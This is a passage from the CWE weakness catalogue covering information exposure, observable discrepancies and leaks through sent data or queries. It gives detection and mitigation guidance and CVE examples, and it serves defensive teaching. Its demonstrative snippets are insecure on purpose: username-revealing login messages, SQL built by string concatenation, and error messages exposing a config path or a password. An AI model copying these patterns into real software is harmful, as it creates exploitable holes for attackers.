- is not directly related to the mishandling of the information itself, such as an out-of-bounds read that accesses sensitive memory contents; here, the out-of-bounds read is the primary weakness, not the disclosure of the memory. In addition, this phrase is also used frequently in policies and legal documents, but it does not refer to any disclosure of security-relevant information. + + + Information Leak + This is a frequently used term, however the "leak" term has multiple uses within security. In some cases it deals with the accidental exposure of information from a different weakness, but in other cases (such as "memory leak"), this deals with improper tracking of resources, which can lead to exhaustion. As a result, CWE is actively avoiding usage of the "leak" term. + + + + + Architecture and Design + + + Implementation + + + High + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Inter-application Flow Analysis + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + Automated Monitored Execution + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Context-configured Source Code Weakness Analyzer + + Cost effective for partial coverage: + + Source code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + The following code checks validity of the supplied username and password and notifies the user of a successful or failed login. + + my $username=param('username'); + my $password=param('password'); + + if (IsValidUsername($username) == 1) + { + if (IsValidPassword($username, $password) == 1) + { + print "Login Successful"; + } + else + { + print "Login Failed - incorrect password"; + } + } + else + { + print "Login Failed - unknown username"; + } + + + In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials. + While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as: + + "Login Failed - incorrect username or password" + + + + This code tries to open a database connection, and prints any exceptions that occur. + + try {openDbConnection();} + //print exception message that includes exception message and configuration file location + catch (Exception $e) {echo 'Caught exception: ', $e->getMessage(), '\n';echo 'Check credentials in config file at: ', $Mysql_config_location, '\n';} + + If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database. + + + In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file. + + public BankAccount getUserBankAccount(String username, String accountNumber) { + BankAccount userAccount = null;String query = null;try {if (isAuthorizedUser(username)) {query = "SELECT * FROM accounts WHERE owner = "+ username + " AND accountID = " + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);}} catch (SQLException ex) {String logMessage = "Unable to retrieve account information from database,\nquery: " + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);}return userAccount; + } + + The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database. + + + This code stores location information about the current user: + + locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation()); + ... + + catch (Exception e) {AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage("Sorry, this application has experienced an error.");AlertDialog alert = builder.create();alert.show();Log.e("ExampleActivity", "Caught exception: " + e + " While on User:" + User.toString());} + + When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user's location is also written to the log. + + + The following is an actual MySQL error statement: + + Warning: mysql_pconnect(): Access denied for user: 'root@localhost' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4 + + The error clearly exposes the database credentials. + + + This code displays some information on a web page. + + Social Security Number: <%= ssn %></br>Credit Card Number: <%= ccn %> + + The code displays a user's credit card and social security numbers, even though they aren't absolutely necessary. + + + The following program changes its behavior based on a debug flag. + + <% if (Boolean.getBoolean("debugEnabled")) { + %>User account number: <%= acctNo %><%} %> + + + + + The code writes sensitive debug information to the client browser if the "debugEnabled" flag is set to true . + + + This code uses location to determine the user's current US State location. + First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml: + + <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> + + During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible: + + locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation); + + While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in. + + + + + CVE-2001-1483 + Enumeration of valid usernames based on inconsistent responses + https://www.cve.org/CVERecord?id=CVE-2001-1483 + + + CVE-2001-1528 + Account number enumeration via inconsistent responses. + https://www.cve.org/CVERecord?id=CVE-2001-1528 + + + CVE-2004-2150 + User enumeration via discrepancies in error messages. + https://www.cve.org/CVERecord?id=CVE-2004-2150 + + + CVE-2005-1205 + Telnet protocol allows servers to obtain sensitive environment information from clients. + https://www.cve.org/CVERecord?id=CVE-2005-1205 + + + CVE-2002-1725 + Script calls phpinfo(), revealing system configuration to web user + https://www.cve.org/CVERecord?id=CVE-2002-1725 + + + CVE-2002-0515 + Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs. + https://www.cve.org/CVERecord?id=CVE-2002-0515 + + + CVE-2004-0778 + Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned. + https://www.cve.org/CVERecord?id=CVE-2004-0778 + + + CVE-2000-1117 + Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method. + https://www.cve.org/CVERecord?id=CVE-2000-1117 + + + CVE-2003-0190 + Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. + https://www.cve.org/CVERecord?id=CVE-2003-0190 + + + CVE-2008-2049 + POP3 server reveals a password in an error message after multiple APOP commands are sent. Might be resultant from another weakness. + https://www.cve.org/CVERecord?id=CVE-2008-2049 + + + CVE-2007-5172 + Program reveals password in error message if attacker can trigger certain database errors. + https://www.cve.org/CVERecord?id=CVE-2007-5172 + + + CVE-2008-4638 + Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209). + https://www.cve.org/CVERecord?id=CVE-2008-4638 + + + CVE-2007-1409 + Direct request to library file in web application triggers pathname leak in error message. + https://www.cve.org/CVERecord?id=CVE-2007-1409 + + + CVE-2005-0603 + Malformed regexp syntax leads to information exposure in error message. + https://www.cve.org/CVERecord?id=CVE-2005-0603 + + + CVE-2004-2268 + Password exposed in debug information. + https://www.cve.org/CVERecord?id=CVE-2004-2268 + + + CVE-2003-1078 + FTP client with debug option enabled shows password to the screen. + https://www.cve.org/CVERecord?id=CVE-2003-1078 + + + CVE-2022-0708 + Collaboration platform does not clear team emails in a response, allowing leak of email addresses + https://www.cve.org/CVERecord?id=CVE-2022-0708 + + + + + Information Leak (information disclosure) + + + A6 + Information Leakage and Improper Error Handling + CWE More Specific + + + 13 + Information Leakage + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + CWE-200 is commonly misused to represent the loss of confidentiality in a vulnerability, but confidentiality loss is a technical impact - not a root cause error. As of CWE 4.9, over 400 CWE entries can lead to a loss of confidentiality. Other options are often available. [REF-1287]. + If an error or mistake causes information to be disclosed, then use the CWE ID for that error. Consider starting with improper authorization (CWE-285), insecure permissions (CWE-732), improper authentication (CWE-287), etc. Also consider children such as Insertion of Sensitive Information Into Sent Data (CWE-201), Observable Discrepancy (CWE-203), Insertion of Sensitive Information into Externally-Accessible File or Directory (CWE-538), or others. + + + + + + As a result of mapping analysis in the 2020 Top 25 and more recent versions, this weakness is under review, since it is frequently misused in mapping to cover many problems that lead to loss of confidentiality. See Mapping Notes, Extended Description, and Alternate Terms. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-12-28 + updated Alternate_Terms, Description, Name + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Applicable_Platforms, References + + + CWE Content Team + MITRE + 2014-06-23 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Related_Attack_Patterns, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Alternate_Terms, Description, Maintenance_Notes, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Nick Johnston + 2022-07-11 + Identified incorrect language tag in demonstrative example. + + Information Leak (Information Disclosure) + Information Exposure + + + + The code transmits data to another actor, but a portion of the data includes sensitive information that should not be accessible to that actor. + Sensitive information could include data that is sensitive in and of itself (such as credentials or private messages), or otherwise useful in the further exploitation of the system (such as internal file system structure). + + + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Read Files or Directories + Read Memory + Read Application Data + Sensitive data may be exposed to attackers. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + Specify which data in the software should be regarded as sensitive. Consider which types of users should have access to which types of data. + + + Implementation + Ensure that any possibly sensitive data specified in the requirements is verified with designers to ensure that it is either a calculated risk or mitigated elsewhere. Any information that is not necessary to the functionality should be removed in order to lower both the overhead and the possibility of security sensitive data being sent. + + + System Configuration + Setup default error messages so that unexpected errors do not disclose sensitive information. + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + + + The following is an actual MySQL error statement: + + Warning: mysql_pconnect(): Access denied for user: 'root@localhost' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4 + + The error clearly exposes the database credentials. + + + + + CVE-2022-0708 + Collaboration platform does not clear team emails in a response, allowing leak of email addresses + https://www.cve.org/CVERecord?id=CVE-2022-0708 + + + + + Accidental leaking of sensitive information through sent data + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Common_Consequences, Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Demonstrative_Examples, Description, Name, References, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Description, Name + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Sent Data + Information Exposure Through Sent Data + Exposure of Sensitive Information Through Sent Data + + + + When trying to keep information confidential, an attacker can often infer some of the information by using statistics. + In situations where data should not be tied to individual users, but a large number of users should be able to make queries that "scrub" the identity of users, it may be possible to get information about a user -- e.g., by specifying search terms that are known to be unique to that user. + + + + + + + + + Architecture and Design + + + Implementation + + + Medium + + + Confidentiality + Read Files or Directories + Read Application Data + Sensitive information may possibly be leaked through data queries accidentally. + + + + + Architecture and Design + This is a complex topic. See the book Translucent Databases for a good discussion of best practices. + + + + + See the book Translucent Databases for examples. + + + + + Accidental leaking of sensitive information through data queries + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + The relationship between CWE-202 and CWE-612 needs to be investigated more closely, as they may be different descriptions of the same kind of problem. CWE-202 is also being considered for deprecation, as it is not clearly described and may have been misunderstood by CWE users. It could be argued that this issue is better covered by CAPEC; an attacker can utilize their data-query privileges to perform this kind of operation, and if the attacker should not be allowed to perform the operation - or if the sensitive data should not have been made accessible at all - then that is more appropriately classified as a separate CWE related to authorization (see the parent, CWE-1230). + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Maintenance_Notes, Name, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Data Queries + Privacy Leak through Data Queries + Exposure of Sensitive Data Through Data Queries + + + + The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. + Discrepancies can take many forms, and variations may be detectable in timing, control flow, communications such as replies or requests, or general behavior. These discrepancies can reveal information about the product's operation or internal state to an unauthorized actor. In some cases, discrepancies can be used by attackers to form a side channel. + + + + + + + + + + + Side Channel Attack + Observable Discrepancies are at the root of side channel attacks. + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Access Control + Read Application Data + Bypass Protection Mechanism + An attacker can gain access to sensitive information about the system, including authentication information that may allow an attacker to gain access to the system. + + + Confidentiality + Read Application Data + When cryptographic primitives are vulnerable to side-channel-attacks, this could be used to reveal unencrypted plaintext in the worst case. + + + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + Implementation + + Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. + If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. + Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. + + + + + + The following code checks validity of the supplied username and password and notifies the user of a successful or failed login. + + my $username=param('username'); + my $password=param('password'); + + if (IsValidUsername($username) == 1) + { + if (IsValidPassword($username, $password) == 1) + { + print "Login Successful"; + } + else + { + print "Login Failed - incorrect password"; + } + } + else + { + print "Login Failed - unknown username"; + } + + + In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials. + While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as: + + "Login Failed - incorrect username or password" + + + + Non-uniform processing time causes timing channel. + Suppose an algorithm for implementing an encryption routine works fine per se, but the time taken to output the result of the encryption routine depends on a relationship between the input plaintext and the key (e.g., suppose, if the plaintext is similar to the key, it would run very fast). + In the example above, an attacker may vary the inputs, then observe differences between processing times (since different plaintexts take different time). This could be used to infer information about the key. + Artificial delays may be added to ensured all calculations take equal time to execute. + + + Suppose memory access patterns for an encryption routine are dependent on the secret key. + An attacker can recover the key by knowing if specific memory locations have been accessed or not. The value stored at those memory locations is irrelevant. The encryption routine's memory accesses will affect the state of the processor cache. If cache resources are shared across contexts, after the encryption routine completes, an attacker in different execution context can discover which memory locations the routine accessed by measuring the time it takes for their own memory accesses to complete. + + + + + CVE-2020-8695 + Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure. + https://www.cve.org/CVERecord?id=CVE-2020-8695 + + + CVE-2002-2094 + This, and others, use ".." attacks and monitor error responses, so there is overlap with directory traversal. + https://www.cve.org/CVERecord?id=CVE-2002-2094 + + + CVE-2001-1483 + Enumeration of valid usernames based on inconsistent responses + https://www.cve.org/CVERecord?id=CVE-2001-1483 + + + CVE-2001-1528 + Account number enumeration via inconsistent responses. + https://www.cve.org/CVERecord?id=CVE-2001-1528 + + + CVE-2004-2150 + User enumeration via discrepancies in error messages. + https://www.cve.org/CVERecord?id=CVE-2004-2150 + + + CVE-2005-1650 + User enumeration via discrepancies in error messages. + https://www.cve.org/CVERecord?id=CVE-2005-1650 + + + CVE-2004-0294 + Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack. + https://www.cve.org/CVERecord?id=CVE-2004-0294 + + + CVE-2004-0243 + Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods. + https://www.cve.org/CVERecord?id=CVE-2004-0243 + + + CVE-2002-0514 + Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL. + https://www.cve.org/CVERecord?id=CVE-2002-0514 + + + CVE-2002-0515 + Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs. + https://www.cve.org/CVERecord?id=CVE-2002-0515 + + + CVE-2002-0208 + Product modifies TCP/IP stack and ICMP error messages in unusual ways that show the product is in use. + https://www.cve.org/CVERecord?id=CVE-2002-0208 + + + CVE-2004-2252 + Behavioral infoleak by responding to SYN-FIN packets. + https://www.cve.org/CVERecord?id=CVE-2004-2252 + + + CVE-2001-1387 + Product may generate different responses than specified by the administrator, possibly leading to an information leak. + https://www.cve.org/CVERecord?id=CVE-2001-1387 + + + CVE-2004-0778 + Version control system allows remote attackers to determine the existence of arbitrary files and directories via the -X command for an alternate history file, which causes different error messages to be returned. + https://www.cve.org/CVERecord?id=CVE-2004-0778 + + + CVE-2004-1428 + FTP server generates an error message if the user name does not exist instead of prompting for a password, which allows remote attackers to determine valid usernames. + https://www.cve.org/CVERecord?id=CVE-2004-1428 + + + CVE-2003-0078 + SSL implementation does not perform a MAC computation if an incorrect block cipher padding is used, which causes an information leak (timing discrepancy) that may make it easier to launch cryptographic attacks that rely on distinguishing between padding and MAC verification errors, possibly leading to extraction of the original plaintext, aka the "Vaudenay timing attack." + https://www.cve.org/CVERecord?id=CVE-2003-0078 + + + CVE-2000-1117 + Virtual machine allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method. + https://www.cve.org/CVERecord?id=CVE-2000-1117 + + + CVE-2003-0637 + Product uses a shorter timeout for a non-existent user than a valid user, which makes it easier for remote attackers to guess usernames and conduct brute force password guessing. + https://www.cve.org/CVERecord?id=CVE-2003-0637 + + + CVE-2003-0190 + Product immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack. + https://www.cve.org/CVERecord?id=CVE-2003-0190 + + + CVE-2004-1602 + FTP server responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response. + https://www.cve.org/CVERecord?id=CVE-2004-1602 + + + CVE-2005-0918 + Browser allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not. + https://www.cve.org/CVERecord?id=CVE-2005-0918 + + + + + Discrepancy Information Leaks + + + A6 + Information Leakage and Improper Error Handling + CWE More Specific + + + A7 + Improper Error Handling + CWE More Specific + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Alternate_Terms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships, Research_Gaps + + + CWE Content Team + MITRE + 2020-12-10 + updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Research_Gaps + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Nicole Fern + Tortuga Logic + 2020-06-03 + Provided Demonstrative Example for cache timing attack + + Discrepancy Information Leaks + Information Exposure Through Discrepancy + Observable Discrepancy + Observable Differences in Behavior to Error Inputs + + + + The product provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere. + This issue frequently occurs during authentication, where a difference in failed-login messages could allow an attacker to determine if the username is valid or not. These exposures can be inadvertent (bug) or intentional (design). + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Access Control + Read Application Data + Bypass Protection Mechanism + + + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + Implementation + + Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. + If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. + Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. + + + + + + The following code checks validity of the supplied username and password and notifies the user of a successful or failed login. + + my $username=param('username'); + my $password=param('password'); + + if (IsValidUsername($username) == 1) + { + if (IsValidPassword($username, $password) == 1) + { + print "Login Successful"; + } + else + { + print "Login Failed - incorrect password"; + } + } + else + { + print "Login Failed - unknown username"; + } + + + In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials. + While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as: + + "Login Failed - incorrect username or password" + + + + + + CVE-2002-2094 + This, and others, use ".." attacks and monitor error responses, so there is overlap with directory traversal. + https://www.cve.org/CVERecord?id=CVE-2002-2094 + + + CVE-2001-1483 + Enumeration of valid usernames based on inconsistent responses + https://www.cve.org/CVERecord?id=CVE-2001-1483 + + + CVE-2001-1528 + Account number enumeration via inconsistent responses. + https://www.cve.org/CVERecord?id=CVE-2001-1528 + + + CVE-2004-2150 + User enumeration via discrepancies in error messages. + https://www.cve.org/CVERecord?id=CVE-2004-2150 + + + CVE-2005-1650 + User enumeration via discrepancies in error messages. + https://www.cve.org/CVERecord?id=CVE-2005-1650 + + + CVE-2004-0294 + Bulletin Board displays different error messages when a user exists or not, which makes it easier for remote attackers to identify valid users and conduct a brute force password guessing attack. + https://www.cve.org/CVERecord?id=CVE-2004-0294 + + + CVE-2004-0243 + Operating System, when direct remote login is disabled, displays a different message if the password is correct, which allows remote attackers to guess the password via brute force methods. + https://www.cve.org/CVERecord?id=CVE-2004-0243 + + + CVE-2002-0514 + Product allows remote attackers to determine if a port is being filtered because the response packet TTL is different than the default TTL. + https://www.cve.org/CVERecord?id=CVE-2002-0514 + + + CVE-2002-0515 + Product sets a different TTL when a port is being filtered than when it is not being filtered, which allows remote attackers to identify filtered ports by comparing TTLs. + 